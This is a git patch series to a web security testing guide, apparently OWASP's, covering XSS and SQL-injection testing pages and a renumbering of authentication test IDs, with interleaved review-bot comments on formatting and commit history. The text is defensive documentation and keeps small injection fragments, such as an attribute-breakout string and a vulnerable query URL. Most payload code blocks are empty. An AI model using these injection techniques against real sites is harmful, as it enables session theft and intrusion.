@@ -19,14 +19,17 @@ DOM-based XSS: The vulnerability arises from insecure handling of client-side Ja An XSS attack occurs when an attacker can inject untrusted data into a web application, which is then included in a response that is sent to other users. This untrusted data can be included in various contexts within an HTML document, including: HTML tags: If user-supplied input is inserted without proper encoding into HTML tags, it can lead to script execution. For example: + ```js ``` + HTML attributes: If user-supplied input is included in HTML attributes without proper encoding, it can be exploited to execute scripts. For example: ```js ``` + JavaScript code: If user-supplied input is directly inserted into JavaScript code without proper escaping or validation, it can lead to script execution. For example, ```js @@ -57,6 +60,7 @@ The first step in XSS testing is to identify all user-supplied input fields or p Once the input fields or parameters are identified, the following techniques can be employed to detect XSS vulnerabilities: HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example: + ```js ``` 
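Review bot: the added blank lines fix the rendering of the fenced blocks, but the first two blocks they surround are tagged ```js although the prose introduces them as "HTML tags" and "HTML attributes" examples; tag those fences `html` so highlighting and markdown linting match the content, and apply the same check to the HTML Injection block in the second hunk.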
@@ -72,6 +76,7 @@ Attribute Injection: Inject special characters or event handlers into HTML attri If the injected content is rendered without proper encoding, the browser will interpret it as part of the attribute value, leading to script execution. JavaScript Injection: Inject JavaScript code into areas of the application where it is expected to be executed. This includes JavaScript code within ` ``` -This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim website, `http://example/`. +This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim site, `http://example/`. #### Example 7: HTTP Parameter Pollution (HPP) From b916869cc43988749259e156398fbb061c04d50f Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Sat, 1 Jul 2023 08:13:31 +0530 Subject: [PATCH 28/37] formatting mistake fixed (#591) --- .../01.3-Testing_for_DOM-based_Cross_Site_Scripting.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md index 9a99d63cd4..ad3434a218 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md 
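Review bot: the PATCH 27 hunk rewrites "victim website" to "victim site" on the very line that PATCH 19 changed from "web site" to "website"; squash the two commits into one so the history records a single change to this sentence rather than an intermediate spelling that is immediately reverted.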
@@ -37,7 +37,7 @@ The [consequences](https://owasp.org/www-community/attacks/xss/) of DOM-based XS ## How to Test -JavaScript applications differ significantly from other types of applications because they are often dynamically generated by the server. To understand what code is being executed, the website being tested needs to be crawled to determine all the instances of JavaScript being executed and where user input is accepted. Many websites rely on large libraries of functions, which often stretch into the hundreds of thousands of lines of code and have not been developed in-house. In these cases, top-down testing often becomes the only viable option, since many bottom level functions are never used, and analyzing them to determine which are sinks will use up more time than is often available. The same can also be said for top-down testing if the inputs or lack thereof is not identified to begin with. +JavaScript applications differ significantly from other types of applications because they are often dynamically generated by the server. To understand what code is being executed, the site being tested needs to be crawled to determine all the instances of JavaScript being executed and where user input is accepted. Many sites rely on large libraries of functions, which often stretch into the hundreds of thousands of lines of code and have not been developed in-house. In these cases, top-down testing often becomes the only viable option, since many bottom level functions are never used, and analyzing them to determine which are sinks will use up more time than is often available. The same can also be said for top-down testing if the inputs or lack thereof is not identified to begin with. User input comes in two main forms: From 209123f5d924af319324b61b4ccc445e2e9dc50d Mon Sep 17 00:00:00 2001 
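Review bot: in the @@ -37,7 hunk of 01.3-Testing_for_DOM-based_Cross_Site_Scripting.md the rewritten `+` line still ends with a subject-verb mismatch, "if the inputs or lack thereof is not identified"; since the whole line is being replaced for the "website" to "site" change anyway, make it "are not identified" and hyphenate "bottom-level functions" in the same pass.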
From: Manindar Mohan Date: Mon, 3 Jul 2023 17:54:31 +0530 Subject: [PATCH 29/37] Mistake caused by insufficient new lines fixed --- .../01-Testing_for_Cross_Site_Scripting.md | 21 ++++++++++++++++--- 1 file changed, 18 insertions(+), 3 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md index bc26715b24..1eee8236f7 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md 
@@ -20,29 +20,36 @@ An XSS attack occurs when an attacker can inject untrusted data into a web appli HTML tags: If user-supplied input is inserted without proper encoding into HTML tags, it can lead to script execution. For example: + ```js ``` + HTML attributes: If user-supplied input is included in HTML attributes without proper encoding, it can be exploited to execute scripts. For example: + ```js ``` -JavaScript code: If user-supplied input is directly inserted into JavaScript code without proper escaping or validation, it can lead to script execution. For example, + +JavaScript code: If user-supplied input is directly inserted into JavaScript code without proper escaping or validation, it can lead to script execution. For example: + ```js var userInput = '<%= userInput %>'; - ``` -URLs: If user-supplied input is included in URLs without proper encoding, it can result in script execution. For example, + +URLs: If user-supplied input is included in URLs without proper encoding, it can result in script execution. For example: + ```js https://example.com/search?q= ``` + XSS vulnerabilities can have severe consequences, ranging from stealing sensitive user information to performing actions on behalf of the user, such as modifying account settings or making unauthorized transactions. ## Test Objectives 
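Review bot: in the @@ -20,29 hunk of 01-Testing_for_Cross_Site_Scripting.md the "URLs" example `https://example.com/search?q=` sits in a ```js fence; it is a URL, not JavaScript, so tag that fence `text`. The blank lines this hunk inserts after each "For example:" come on top of the blank lines the same file already gained earlier in this series and are deleted again by a later commit in the series; squash the whitespace-only commits on this file into one. Changing "For example," to "For example:" for all four contexts is a good consistency fix and should stay.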
@@ -61,34 +68,42 @@ Once the input fields or parameters are identified, the following techniques can HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example: + ```js ``` + If the injected HTML tags are not properly sanitized, they will be interpreted and executed by the browser. Attribute Injection: Inject special characters or event handlers into HTML attributes and check if they are executed. For example: + ```js "> ``` + If the injected content is rendered without proper encoding, the browser will interpret it as part of the attribute value, leading to script execution. JavaScript Injection: Inject JavaScript code into areas of the application where it is expected to be executed. This includes JavaScript code within ` ``` + If the injected script is not properly encoded, it will be interpreted as part of the URL and executed by the browser. Context-Specific Injection: Test for XSS vulnerabilities in specific contexts such as input fields used in search functionality, comment sections, messaging systems, or any other areas where user-supplied input is displayed to other users. From 907b73ca265bbbe63025897c14e09086cbccbf7a Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Mon, 3 Jul 2023 17:55:15 +0530 Subject: [PATCH 30/37] Mistake caused by top level heading fixed --- .../01.3-Testing_for_DOM-based_Cross_Site_Scripting.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md index ad3434a218..7543567ec2 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md 
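Review bot: in the @@ -61,34 hunk the "JavaScript Injection" paragraph ends with an inline code span that is opened after "within" (a lone backtick) and never closed before the fence that follows; close the span or drop the stray backtick, otherwise the rest of the paragraph and the fence marker render as inline code. The `">` snippet under "Attribute Injection" is HTML, not JavaScript, so its fence should be tagged `html` as well.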
@@ -1,11 +1,11 @@ +# Testing for DOM-Based Cross Site Scripting + ## References - [DomXSSWiki](https://github.com/wisec/domxsswiki/wiki/) - [DOM XSS article by Amit Klein](http://www.webappsec.org/projects/articles/071105.html) -# Testing for DOM-Based Cross Site Scripting - ## Summary [DOM-based cross-site scripting](https://owasp.org/www-community/attacks/DOM_Based_XSS) is the de-facto name for [XSS](https://owasp.org/www-community/attacks/xss/) bugs that are the result of active browser-side content on a page, typically JavaScript, obtaining user input through a [source](https://github.com/wisec/domxsswiki/wiki/sources) and using it in a [sink](https://github.com/wisec/domxsswiki/wiki/Sinks), leading to the execution of injected code. This document only discusses JavaScript bugs which lead to XSS. From 9ea08015bc94ecddfdc2c088ec42937ad3e4f4ab Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Mon, 3 Jul 2023 17:56:43 +0530 Subject: [PATCH 31/37] Mistake caused by insuffitent new lines fixed --- .../01-Testing_for_Cross_Site_Scripting.md | 16 ---------------- 1 file changed, 16 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md index 1eee8236f7..2de7b8b1c4 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md 
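Review bot: moving the `#` title above `## References` fixes the heading order, but `## References` now sits between the title and `## Summary`; the other pages in this series keep References at the end (the SSTI page touched at the end of the series lists its references after its test content, around line 120). Move the References section to the bottom of the file in the same commit.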
@@ -20,36 +20,28 @@ An XSS attack occurs when an attacker can inject untrusted data into a web appli HTML tags: If user-supplied input is inserted without proper encoding into HTML tags, it can lead to script execution. For example: - ```js ``` - HTML attributes: If user-supplied input is included in HTML attributes without proper encoding, it can be exploited to execute scripts. For example: - ```js ``` - JavaScript code: If user-supplied input is directly inserted into JavaScript code without proper escaping or validation, it can lead to script execution. For example: - ```js var userInput = '<%= userInput %>'; ``` - URLs: If user-supplied input is included in URLs without proper encoding, it can result in script execution. For example: - ```js https://example.com/search?q= ``` - XSS vulnerabilities can have severe consequences, ranging from stealing sensitive user information to performing actions on behalf of the user, such as modifying account settings or making unauthorized transactions. ## Test Objectives 
@@ -68,42 +60,34 @@ Once the input fields or parameters are identified, the following techniques can HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example: - ```js ``` - If the injected HTML tags are not properly sanitized, they will be interpreted and executed by the browser. Attribute Injection: Inject special characters or event handlers into HTML attributes and check if they are executed. For example: - ```js "> ``` - If the injected content is rendered without proper encoding, the browser will interpret it as part of the attribute value, leading to script execution. JavaScript Injection: Inject JavaScript code into areas of the application where it is expected to be executed. This includes JavaScript code within ` ``` - If the injected script is not properly encoded, it will be interpreted as part of the URL and executed by the browser. Context-Specific Injection: Test for XSS vulnerabilities in specific contexts such as input fields used in search functionality, comment sections, messaging systems, or any other areas where user-supplied input is displayed to other users. From effe070a820edb470bda660573bc58b9309cca76 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Mon, 3 Jul 2023 17:59:34 +0530 Subject: [PATCH 32/37] Mistake caused by insuffitent new lines fixed --- .../01-Testing_for_Cross_Site_Scripting.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md index 2de7b8b1c4..8dcff56c9d 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md 
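Review bot: the deletions in the @@ -20,36 and @@ -68,42 hunks remove exactly the blank lines that PATCH 29/37 inserted into the same file, so the two commits cancel each other; squash them (together with the trailing-whitespace fix that follows) into a single whitespace commit rather than carrying a change-and-revert in the series. The subject line "insufficient new lines fixed" also describes the opposite of what this diff does, which only removes lines.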
@@ -58,7 +58,7 @@ The first step in XSS testing is to identify all user-supplied input fields or p Once the input fields or parameters are identified, the following techniques can be employed to detect XSS vulnerabilities: -HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example: +HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example: ```js @@ -66,7 +66,7 @@ HTML Injection: Inject HTML tags and check if they are rendered as part of the w If the injected HTML tags are not properly sanitized, they will be interpreted and executed by the browser. -Attribute Injection: Inject special characters or event handlers into HTML attributes and check if they are executed. For example: +Attribute Injection: Inject special characters or event handlers into HTML attributes and check if they are executed. For example: ```js "> @@ -74,7 +74,7 @@ Attribute Injection: Inject special characters or event handlers into HTML attri If the injected content is rendered without proper encoding, the browser will interpret it as part of the attribute value, leading to script execution. -JavaScript Injection: Inject JavaScript code into areas of the application where it is expected to be executed. This includes JavaScript code within ` From b068749cc0aa60799a1e85c473f2291d4c11fed2 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Mon, 3 Jul 2023 18:06:13 +0530 Subject: [PATCH 33/37] Mistake caused by broken link fixed --- .../07-Input_Validation_Testing/03.2-Testing_for_MySQL.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md index a17e08bfda..01795bc5d6 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md 
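Review bot: in the @@ -58,7, @@ -66,7 and @@ -74,7 hunks each `-`/`+` pair is identical in visible text, so this is a trailing-whitespace change; say so in the commit message (the "insufficient new lines" wording does not describe it) and fold it into the earlier whitespace commits on this file.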
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md @@ -19,7 +19,7 @@ MySQL comes with at least four versions which are used in production worldwide, It should be noted that for MySQL versions before 4.0.x, only Boolean or time-based Blind Injection attacks could be used, since the subquery functionality or `UNION` statements were not implemented. -From now on, we will assume that there is a classic SQL injection vulnerability, which can be triggered by a request similar to the one described in the Section on [Testing for SQL Injection](05-Testing_for_SQL_Injection.md). +From now on, we will assume that there is a classic SQL injection vulnerability, which can be triggered by a request similar to the one described in the Section on [Testing for SQL Injection](03-Testing_for_SQL_Injection.md). `http://www.example.com/page.php?id=2` From 84536e7bf429e8a2c807af1ae9359dd641e582d2 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Mon, 3 Jul 2023 18:06:42 +0530 Subject: [PATCH 34/37] Mistake caused by Incorrect usage of the term fixed --- .../01.2-Testing_for_Stored_Cross_Site_Scripting.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md index f0b57b5788..35b4c5a82a 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md 
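Review bot: the link fix from `05-Testing_for_SQL_Injection.md` to `03-Testing_for_SQL_Injection.md` is correct after the renumbering earlier in this series, but it is the only cross-reference updated here; the same renumbering is likely to have left stale relative links in the sibling 03.x pages and elsewhere, so grep the document tree for the old file names (for example `grep -rn '05-Testing_for_SQL_Injection' document/`) and fix every remaining stale link in the same commit.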
@@ -4,7 +4,7 @@ Stored [Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios. -Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the website and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS. +Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS. This vulnerability can be used to conduct a number of browser-based attacks including: From cd9010b84d256814833c9a708ea41e527131a5a1 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Mon, 3 Jul 2023 18:15:10 +0530 Subject: [PATCH 35/37] Mistake caused by roken link for case study is fixed by adding new case study link old one is not available anymore --- .../07-Input_Validation_Testing/03.2-Testing_for_MySQL.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
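Review bot: the @@ -4,7 hunk of 01.2-Testing_for_Stored_Cross_Site_Scripting.md rewrites the sentence only to swap "website" for "site" and leaves "this may also called second-order XSS" in the `+` line; since the line is being touched, fix it to "this may also be called second-order XSS".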
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md index 01795bc5d6..fa5afe1247 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md @@ -224,4 +224,4 @@ For a complete list, refer to the [MySQL manual](https://dev.mysql.com/doc/refma ### Case Studies -- [Zeelock: Blind Injection in MySQL Databases](https://archive.cert.uni-stuttgart.de/bugtraq/2005/02/msg00289.html) +- [All Your Databases Belong To Me! A Blind SQLi Case Study](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study) From 39e23bf60a5ac788570ef03d60ade1ca4a804e66 Mon Sep 17 00:00:00 2001 
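Review bot: the new entry in the @@ -224,4 hunk is a different case study, not the Zeelock write-up the bullet previously pointed to; either keep the original title and point it at an archived copy (if one exists on the Wayback Machine) or state in the commit message that the reference is being replaced rather than repaired, so readers who followed the older citation know the Zeelock reference is gone.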
From: Manindar Mohan Date: Tue, 11 Jul 2023 12:58:45 +0530 Subject: [PATCH 36/37] ATHN-01 removed and added renamed to new numbers (#598) --- ...or_Credentials_Transported_over_an_Encrypted_Channel.md | 7 ------- ...redentials.md => 01-Testing_for_Default_Credentials.md} | 2 +- ...hanism.md => 02-Testing_for_Weak_Lock_Out_Mechanism.md} | 2 +- ...d => 03-Testing_for_Bypassing_Authentication_Schema.md} | 2 +- ...d.md => 04-Testing_for_Vulnerable_Remember_Password.md} | 2 +- ...esses.md => 05-Testing_for_Browser_Cache_Weaknesses.md} | 2 +- ...rd_Policy.md => 06-Testing_for_Weak_Password_Policy.md} | 2 +- ....md => 07-Testing_for_Weak_Security_Question_Answer.md} | 2 +- ...g_for_Weak_Password_Change_or_Reset_Functionalities.md} | 2 +- ...ng_for_Weaker_Authentication_in_Alternative_Channel.md} | 2 +- ...cation.md => 10-Testing_Multi-Factor_Authentication.md} | 4 ++-- 11 files changed, 11 insertions(+), 18 deletions(-) delete mode 100644 document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Credentials_Transported_over_an_Encrypted_Channel.md rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{02-Testing_for_Default_Credentials.md => 01-Testing_for_Default_Credentials.md} (99%) rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{03-Testing_for_Weak_Lock_Out_Mechanism.md => 02-Testing_for_Weak_Lock_Out_Mechanism.md} (99%) rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{04-Testing_for_Bypassing_Authentication_Schema.md => 03-Testing_for_Bypassing_Authentication_Schema.md} (99%) rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{05-Testing_for_Vulnerable_Remember_Password.md => 04-Testing_for_Vulnerable_Remember_Password.md} (99%) rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{06-Testing_for_Browser_Cache_Weaknesses.md => 05-Testing_for_Browser_Cache_Weaknesses.md} (99%) rename 
document/4-Web_Application_Security_Testing/04-Authentication_Testing/{07-Testing_for_Weak_Password_Policy.md => 06-Testing_for_Weak_Password_Policy.md} (99%) rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{08-Testing_for_Weak_Security_Question_Answer.md => 07-Testing_for_Weak_Security_Question_Answer.md} (99%) rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{09-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md => 08-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md} (99%) rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md => 09-Testing_for_Weaker_Authentication_in_Alternative_Channel.md} (99%) rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{11-Testing_Multi-Factor_Authentication.md => 10-Testing_Multi-Factor_Authentication.md} (99%) diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Credentials_Transported_over_an_Encrypted_Channel.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Credentials_Transported_over_an_Encrypted_Channel.md deleted file mode 100644 index cc00ac98b7..0000000000 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Credentials_Transported_over_an_Encrypted_Channel.md +++ /dev/null @@ -1,7 +0,0 @@ -# Testing for Credentials Transported over an Encrypted Channel - -|ID | -|------------| -|WSTG-ATHN-01| - -This content has been merged into: [Testing for Sensitive Information Sent via Unencrypted Channels](../09-Testing_for_Weak_Cryptography/03-Testing_for_Sensitive_Information_Sent_via_Unencrypted_Channels.md) 
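Review bot: deleting 01-Testing_for_Credentials_Transported_over_an_Encrypted_Channel.md removes a stub whose only content was the "This content has been merged into: ..." pointer to 03-Testing_for_Sensitive_Information_Sent_via_Unencrypted_Channels.md, so any existing link to that path now breaks instead of redirecting; keep the stub, or confirm no page in the tree still links to it. The renumbering of WSTG-ATHN-02..11 to WSTG-ATHN-01..10 in the following hunks also changes what each identifier refers to, so the checklist, README and any tooling that maps to these IDs must be updated in the same change, and the ID shift deserves a mention in the commit message beyond "ATHN-01 removed".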
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Default_Credentials.md similarity index 99% rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.md rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Default_Credentials.md index 75c413353a..a12b0fae78 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Default_Credentials.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-ATHN-02| +|WSTG-ATHN-01| ## Summary diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Weak_Lock_Out_Mechanism.md similarity index 99% rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism.md rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Weak_Lock_Out_Mechanism.md index c4af512399..31736f497f 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Weak_Lock_Out_Mechanism.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-ATHN-03| +|WSTG-ATHN-02| ## Summary 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Bypassing_Authentication_Schema.md similarity index 99% rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.md rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Bypassing_Authentication_Schema.md index 3396316d24..91f1932b0a 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Bypassing_Authentication_Schema.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-ATHN-04| +|WSTG-ATHN-03| ## Summary diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Vulnerable_Remember_Password.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Vulnerable_Remember_Password.md similarity index 99% rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Vulnerable_Remember_Password.md rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Vulnerable_Remember_Password.md index 608f228019..e9a15bcabe 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Vulnerable_Remember_Password.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Vulnerable_Remember_Password.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-ATHN-05| +|WSTG-ATHN-04| ## Summary 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Browser_Cache_Weaknesses.md similarity index 99% rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.md rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Browser_Cache_Weaknesses.md index 4fae32d5ff..8faebf28c0 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Browser_Cache_Weaknesses.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-ATHN-06| +|WSTG-ATHN-05| ## Summary diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Password_Policy.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Weak_Password_Policy.md similarity index 99% rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Password_Policy.md rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Weak_Password_Policy.md index 2df8511c18..3f5e62332d 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Password_Policy.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Weak_Password_Policy.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-ATHN-07| +|WSTG-ATHN-06| ## Summary 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Security_Question_Answer.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Security_Question_Answer.md similarity index 99% rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Security_Question_Answer.md rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Security_Question_Answer.md index 3e62d1a85e..eac95a52ca 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Security_Question_Answer.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Security_Question_Answer.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-ATHN-08| +|WSTG-ATHN-07| ## Summary diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md similarity index 99% rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md index 882b799c0e..8837ee57d8 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-ATHN-09| +|WSTG-ATHN-08| ## Summary 
